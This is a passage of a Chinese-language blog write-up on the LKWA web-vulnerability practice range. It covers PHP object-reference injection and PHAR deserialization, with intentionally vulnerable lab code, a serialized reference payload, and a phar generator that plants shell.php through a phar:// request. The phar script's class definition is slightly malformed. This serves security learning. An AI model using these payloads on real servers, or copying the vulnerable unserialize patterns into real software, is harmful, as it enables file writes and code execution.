invoke__">serialize</span>(<span class="variable">$x</span>));</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>



<h2 id="PHP-Object-Injection-Object-Reference"><a href="#PHP-Object-Injection-Object-Reference" class="headerlink" title="PHP Object Injection(Object Reference)"></a>PHP Object Injection(Object Reference)</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line">&lt;form action=&quot;objectref.php&quot; method=&quot;post&quot;&gt;</span><br><span class="line">    &lt;div class=&quot;form-group&quot;&gt;</span><br><span class="line">        &lt;label for=&quot;exampleInputEmail1&quot;&gt;Guess&lt;/label&gt;</span><br><span class="line">        &lt;input type=&quot;text&quot; class=&quot;form-control&quot; placeholder=&quot;Enter number&quot; name=&quot;guess&quot;&gt;</span><br><span class="line">        &lt;input type=&quot;hidden&quot; name=&quot;input&quot; value=&#x27;O:8:&quot;stdClass&quot;:2:&#123;s:5:&quot;guess&quot;;N;s:10:&quot;secretCode&quot;;R:1;&#125;&#x27;&gt;</span><br><span class="line">    &lt;/div&gt;</span><br><span class="line">    &lt;button type=&quot;submit&quot; class=&quot;btn btn-primary&quot;&gt;Submit&lt;/button&gt;</span><br><span class="line">    &lt;p&gt;</span><br><span class="line">    &lt;p class=&quot;text-danger&quot;&gt; Can you win this?.&lt;/p&gt;</span><br><span class="line">    &lt;?php</span><br><span class="line">    // vuln code</span><br><span class="line">    if (isset($_POST[&#x27;guess&#x27;])) &#123;</span><br><span class="line">        // code...</span><br><span class="line">        $obj = unserialize($_POST[&#x27;input&#x27;]);</span><br><span class="line">        if($obj) &#123;</span><br><span class="line">            $obj-&gt;guess = $_POST[&#x27;guess&#x27;];</span><br><span class="line">            $obj-&gt;secretCode = rand(500000,999999);</span><br><span class="line">            if($obj-&gt;guess === $obj-&gt;secretCode) &#123;</span><br><span class="line">                echo &quot;&lt;p class=&#x27;text-success&#x27;&gt;You Win !!!!!&lt;/p&gt;&quot;;</span><br><span class="line">            &#125;</span><br><span class="line">            else&#123;</span><br><span class="line">                echo &quot;&lt;p class=&#x27;text-danger&#x27;&gt;Loser!!!!&lt;/p&gt;&quot;;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br></pre></td></tr></table></figure>

<p>当你将一个对象赋值给一个变量时，这个变量会成为该对象的“引用”。如果你将这个变量赋值给另一个变量，则这两个变量都将引用同一个对象。改变其中任何一个变量所引用对象的状态将影响到所有引用该对象的变量。</p>
<p>下面是一个简单的示例：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">MyClass</span> </span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$myVar</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="variable">$obj</span> = <span class="keyword">new</span> <span class="title class_">MyClass</span>();</span><br><span class="line"><span class="variable">$obj</span>-&gt;myVar = <span class="string">&quot;Hello World&quot;</span>;</span><br><span class="line"></span><br><span class="line"><span class="comment">// Create a reference to $obj</span></span><br><span class="line"><span class="variable">$ref</span> = &amp;<span class="variable">$obj</span>;</span><br><span class="line"></span><br><span class="line"><span class="comment">// Update $obj-&gt;myVar</span></span><br><span class="line"><span class="variable">$obj</span>-&gt;myVar = <span class="string">&quot;Goodbye World&quot;</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">echo</span> <span class="variable">$ref</span>-&gt;myVar; <span class="comment">// Output: Goodbye World</span></span><br></pre></td></tr></table></figure>

<p>构造EXP：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Object1</span></span></span><br><span class="line"><span class="class"></span>&#123;</span><br><span class="line">  <span class="keyword">var</span> <span class="variable">$guess</span>;</span><br><span class="line">  <span class="keyword">var</span> <span class="variable">$secretCode</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="variable">$x</span> = <span class="keyword">new</span> <span class="title class_">Object1</span>();</span><br><span class="line"><span class="variable">$x</span>-&gt;guess = &amp;<span class="variable">$x</span>-&gt;secretCode;</span><br><span class="line"><span class="keyword">echo</span> <span class="title function_ invoke__">serialize</span>(<span class="variable">$x</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>在改变 guess 的值的同时也会改变 secretCode。</p>
<h2 id="PHAR-Deserialization"><a href="#PHAR-Deserialization" class="headerlink" title="PHAR Deserialization"></a>PHAR Deserialization</h2><p>PHP phar是一种用于打包和分发PHP应用程序的技术。PHAR代表“PHP归档”，它将多个PHP源代码文件打包成单个文件，这个文件可以像一个可执行文件一样运行。<strong>注意：需要 phar.readonly &#x3D; Off</strong>。</p>
<p>创建一个 phar 文件：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 创建Phar打包对象</span></span><br><span class="line"><span class="variable">$phar</span> = <span class="keyword">new</span> <span class="title class_">Phar</span>(<span class="string">&#x27;myapp.phar&#x27;</span>);</span><br><span class="line"></span><br><span class="line"><span class="comment">// 开始定义打包内容</span></span><br><span class="line"><span class="variable">$phar</span>-&gt;<span class="title function_ invoke__">startBuffering</span>();</span><br><span class="line"></span><br><span class="line"><span class="comment">// 添加源代码文件到PHAR文件中</span></span><br><span class="line"><span class="variable">$phar</span>-&gt;<span class="title function_ invoke__">buildFromDirectory</span>(<span class="string">&#x27;/path/to/source/files&#x27;</span>);</span><br><span class="line"></span><br><span class="line"><span class="comment">// 将脚本添加到PHAR文件中作为可执行文件</span></span><br><span class="line"><span class="variable">$phar</span>-&gt;<span class="title function_ invoke__">setStub</span>(<span class="variable">$phar</span>-&gt;<span class="title function_ invoke__">createDefaultStub</span>(<span class="string">&#x27;index.php&#x27;</span>));</span><br><span class="line"></span><br><span class="line"><span class="comment">// 完成打包操作并保存PHAR文件</span></span><br><span class="line"><span class="variable">$phar</span>-&gt;<span class="title function_ invoke__">stopBuffering</span>();</span><br></pre></td></tr></table></figure>

<p>调用 phar 文件：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">require</span> <span class="string">&#x27;my_app.phar&#x27;</span>; <span class="comment">//加载已经打包好的Phar文件</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// 调用打包好的PHP应用程序</span></span><br><span class="line"><span class="variable">$app</span> = <span class="keyword">new</span> <span class="title class_">MyApp</span>();</span><br><span class="line"><span class="variable">$app</span>-&gt;<span class="title function_ invoke__">run</span>();</span><br></pre></td></tr></table></figure>

<p>学习一下网站的源代码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// uoload.php</span></span><br><span class="line"><span class="comment">// 限制了只能上传 phar 文件</span></span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">include</span>(<span class="string">&quot;sidebar.php&quot;</span>);</span><br><span class="line"><span class="variable">$target_dir</span> = <span class="string">&quot;uploads/&quot;</span>;</span><br><span class="line"><span class="variable">$target_file</span> = <span class="variable">$target_dir</span> . <span class="title function_ invoke__">basename</span>(<span class="variable">$_FILES</span>[<span class="string">&quot;fileToUpload&quot;</span>][<span class="string">&quot;name&quot;</span>]);</span><br><span class="line"><span class="variable">$uploadOk</span> = <span class="number">1</span>;</span><br><span class="line"><span class="variable">$imageFileType</span> = <span class="title function_ invoke__">strtolower</span>(<span class="title function_ invoke__">pathinfo</span>(<span class="variable">$target_file</span>,PATHINFO_EXTENSION));		<span class="comment">// 获取扩展名</span></span><br><span class="line"><span class="comment">// Check if image file is a actual image or fake image</span></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&quot;submit&quot;</span>])) &#123;</span><br><span class="line">    <span class="keyword">if</span>(<span class="variable">$imageFileType</span> !== <span class="string">&quot;PHAR&quot;</span>) &#123;</span><br><span class="line">        <span class="variable">$uploadOk</span> = <span class="number">1</span>;</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&quot;File is not a PHAR file.&quot;</span>;</span><br><span class="line">        <span class="variable">$uploadOk</span> = <span class="number">0</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">// Check if file already exists</span></span><br><span class="line"><span class="keyword">if</span> (<span class="title function_ invoke__">file_exists</span>(<span class="variable">$target_file</span>)) &#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&quot;Sorry, file already exists.&quot;</span>;</span><br><span class="line">    <span class="variable">$uploadOk</span> = <span class="number">0</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">// Allow certain file formats</span></span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$imageFileType</span> != <span class="string">&quot;phar&quot;</span>) &#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&quot;Sorry, only PHAR file is allowed.&quot;</span>;</span><br><span class="line">    <span class="variable">$uploadOk</span> = <span class="number">0</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">// Check if $uploadOk is set to 0 by an error</span></span><br><span class="line"><span class="keyword">if</span> (<span class="variable">$uploadOk</span> == <span class="number">0</span>) &#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&quot;Sorry, your file was not uploaded.&quot;</span>;</span><br><span class="line"><span class="comment">// if everything is ok, try to upload file</span></span><br><span class="line">&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    <span class="keyword">if</span> (<span class="title function_ invoke__">move_uploaded_file</span>(<span class="variable">$_FILES</span>[<span class="string">&quot;fileToUpload&quot;</span>][<span class="string">&quot;tmp_name&quot;</span>], <span class="variable">$target_file</span>)) &#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&quot;The file &quot;</span>. <span class="title function_ invoke__">basename</span>( <span class="variable">$_FILES</span>[<span class="string">&quot;fileToUpload&quot;</span>][<span class="string">&quot;name&quot;</span>]). <span class="string">&quot; has been uploaded.&quot;</span>;</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&quot;Sorry, there was an error uploading your file.&quot;</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// phar_deserial.php</span></span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">include</span>(<span class="string">&quot;sidebar.php&quot;</span>);</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">log</span></span></span><br><span class="line"><span class="class"></span>&#123;</span><br><span class="line">	<span class="keyword">public</span> <span class="variable">$filename</span>=<span class="string">&quot;log.txt&quot;</span>;</span><br><span class="line">	<span class="keyword">public</span> <span class="variable">$data</span>=<span class="string">&quot;log&quot;</span>;</span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">__wakeup</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">        <span class="title function_ invoke__">file_put_contents</span>(<span class="variable">$this</span>-&gt;filename, <span class="variable">$this</span>-&gt;data);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (<span class="title function_ invoke__">file_exists</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;file&#x27;</span>])) &#123;</span><br><span class="line">	<span class="variable">$var</span> = <span class="keyword">new</span> <span class="title function_ invoke__">log</span>();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>在这里 phar 文件里可以包含反序列化的内容，file_exists 函数可以触发反序列化。同时也有其他的函数也会触发，如下表：</p>
<p><img src="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/phar.png" alt="phar"></p>
<p>这里利用 php 语言生成 phar 文件。<strong>注意：需要 phar.readonly &#x3D; Off</strong>。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="comment">// create new Phar</span></span><br><span class="line">@<span class="title function_ invoke__">unlink</span>(<span class="string">&quot;pharfile.phar&quot;</span>);</span><br><span class="line"><span class="variable">$phar</span> = <span class="keyword">new</span> <span class="title class_">Phar</span>(<span class="string">&#x27;pharfile.phar&#x27;</span>);</span><br><span class="line"><span class="variable">$phar</span>-&gt;<span class="title function_ invoke__">startBuffering</span>();</span><br><span class="line"><span class="variable">$phar</span>-&gt;<span class="title function_ invoke__">addFromString</span>(<span class="string">&#x27;test.txt&#x27;</span>, <span class="string">&#x27;data&#x27;</span>);</span><br><span class="line"><span class="variable">$phar</span>-&gt;<span class="title function_ invoke__">setStub</span>(<span class="string">&#x27;&lt;?php __HALT_COMPILER(); ? &gt;&#x27;</span>);</span><br><span class="line"></span><br><span class="line"><span class="comment">// add object of any class as meta data</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">log</span></span></span><br><span class="line"><span class="class"></span>&#123;</span><br><span class="line">    <span class="variable">$object</span>-&gt;filename = <span class="string">&#x27;shell.php&#x27;</span>;</span><br><span class="line">    <span class="variable">$object</span>-&gt;data = <span class="string">&#x27;&lt;?php phpinfo(); ?&gt;&#x27;</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="variable">$object</span> = <span class="keyword">new</span> log;</span><br><span class="line"><span class="variable">$phar</span>-&gt;<span class="title function_ invoke__">setMetadata</span>(<span class="variable">$object</span>);	<span class="comment">// 将 $object 添加为 PHAR 文件的元数据</span></span><br><span class="line"><span class="variable">$phar</span>-&gt;<span class="title function_ invoke__">stopBuffering</span>();</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p><img src="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20230425143449527.png" alt="image-20230425143449527"></p>
<p>利用 <code>phar://</code> 协议访问这个 phar 文件，成功的话会生成 shell.php。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://www.lkwa.com/phar_deserial/phar_deserial.php?file=phar://pharfile.phar</span><br></pre></td></tr></table></figure>

<p><img src="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20230425143637769.png" alt="image-20230425143637769"></p>
<h2 id="SSRF"><a href="#SSRF" class="headerlink" title="SSRF"></a>SSRF</h2><p>So easy!</p>
<h2 id="Variable-variable"><a href="#Variable-variable" class="headerlink" title="Variable variable"></a>Variable variable</h2><p><img src="https://blogimg-1311394354.cos.ap-nanjing.myqcloud.com/images/image-20230425150948817.png" alt="image-20230425150948817"></p>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
        
          <li><a href="/">Home</a></li>
        
          <li><a href="/archives/">Writing</a></li>
        
          <li><a href="/categories/">categories</a></li>
        
          <li><a href="/tags/">tags</a></li>
        
          <li><a href="/links/">links</a></li>
        
          <li><a href="/search/">Search</a></li>
        
          <li><a target="_blank" rel="noopener" href="https://gitee.com/rmrfsad/rmrfsad">Projects</a></li>
        
      </ul>
    </div>

    
    
      <div id="toc-footer" style="display: none">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%89%8D%E8%A8%80"><span class="toc-number">1.</span> <span class="toc-text">前言</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Blind-RCE"><span class="toc-number">2.</span> <span class="toc-text">Blind RCE</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#XSSI"><span class="toc-number">3.</span> <span class="toc-text">XSSI</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#PHP-Object-Injection"><span class="toc-number">4.</span> <span class="toc-text">PHP Object Injection</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#PHP-Object-Injection-cookie"><span class="toc-number">5.</span> <span class="toc-text">PHP Object Injection(cookie)</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#PHP-Object-Injection-Object-Reference"><span class="toc-number">6.</span> <span class="toc-text">PHP Object Injection(Object Reference)</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#PHAR-Deserialization"><span class="toc-number">7.</span> <span class="toc-text">PHAR Deserialization</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#SSRF"><span class="toc-number">8.</span> <span class="toc-text">SSRF</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Variable-variable"><span class="toc-number">9.</span> <span class="toc-text">Variable variable</span></a></li></ol>
      </div>
    

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2023/04/25/Web/LKWA/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2023/04/25/Web/LKWA/&text=LKWA 靶场学习"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2023/04/25/Web/LKWA/&title=LKWA 靶场学习"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2023/04/25/Web/LKWA/&is_video=false&description=LKWA 靶场学习"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=LKWA 靶场学习&body=Check out this article: http://example.com/2023/04/25/Web/LKWA/"><i class="fa-solid fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2023/04/25/Web/LKWA/&title=LKWA 靶场学习"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2023/04/25/Web/LKWA/&title=LKWA 靶场学习"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2023/04/25/Web/LKWA/&title=LKWA 靶场学习"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2023/04/25/Web/LKWA/&title=LKWA 靶场学习"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2023/04/25/Web/LKWA/&name=LKWA 靶场学习&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2023/04/25/Web/LKWA/&t=LKWA 靶场学习"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa-solid fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        
          <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fa-solid fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa-solid fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2021-2024
    Pursue
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a href="/categories/">categories</a></li><!--
     --><!--
       --><li><a href="/tags/">tags</a></li><!--
     --><!--
       --><li><a href="/links/">links</a></li><!--
     --><!--
       --><li><a href="/search/">Search</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="https://gitee.com/rmrfsad/rmrfsad">Projects</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script>




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script>
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->

</body>
</html>
